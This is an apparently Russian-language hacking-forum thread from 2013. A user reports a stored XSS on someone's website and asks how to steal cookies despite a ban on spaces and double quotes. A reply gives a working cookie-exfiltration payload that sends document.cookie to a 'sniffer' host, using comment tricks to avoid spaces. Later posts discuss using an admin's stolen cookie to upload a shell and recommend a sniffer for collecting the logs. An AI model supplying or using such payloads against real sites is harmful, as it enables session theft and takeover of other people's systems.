XSS

Discussion in 'Песочница' started by Massay, 29 Sep 2013.

  1. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Добрый вечер, помогите пожалуйста с информацией. Короче так) В этой области я могу залить любую строчку
    Code:
    <td class='name'><span class='pass'><b>Вот сюда</b></span><br />
    Работает активная XSS. Могу вызвать
    Code:
    <script>alert('1')</script>
    Только вот нужно сформировать как-то строчку чтобы она была в одну строку и без пробела и ".
    Как можно воровать куки или получить доступ к сайту не виходя из этих параметров.
    За любую информацию буду вам очень благодарен!
     
    #1 Massay, 29 Sep 2013
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Вместо пробела "/**/", вместо двойных кавычек одинарные. Пример:
    Code:
    <script>(new/**/Image()).src='http://sniffer/?'+document.cookie</script>
     
    #2 M_script, 29 Sep 2013
  3. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Спасибо большое! А можно как-то шелл залить через такие параметры?
     
    #3 Massay, 29 Sep 2013
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    если ты с помощью телепатии узнаешь все параметры админки и сможешь сымитировать заливку шелла, то почему бы и нет.
     
    #4 d1v, 30 Sep 2013
  5. funny_kaplan

    funny_kaplan New Member

    Joined:
    28 Mar 2013
    Messages:
    43
    Likes Received:
    4
    Reputations:
    0

    Если куки админа получишь, который может залить шелл, то да)
    А через такие параметры - нет.
     
    #5 funny_kaplan, 30 Sep 2013
    Last edited: 30 Sep 2013
  6. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов
     
    #6 Massay, 30 Sep 2013
  7. Enesey

    Enesey New Member

    Joined:
    10 May 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Analyzer - самый толковый по моему.
     
    #7 Enesey, 7 Oct 2013
  8. Enesey

    Enesey New Member

    Joined:
    10 May 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ппц, написал ответ не посмотрев на даты *facepalm*
     
    #8 Enesey, 7 Oct 2013
  9. Batmаn

    Batmаn Banned

    Joined:
    21 Aug 2013
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    а что с датами? неделя всего прошла
     
    #9 Batmаn, 7 Oct 2013
  10. Enesey

    Enesey New Member

    Joined:
    10 May 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ну по мне так автор уже забил на тему
     
    #10 Enesey, 8 Oct 2013
  11. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Спасибо. Нет не забил =) Мне всегда интересно новая информация
     
    #11 Massay, 8 Oct 2013
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.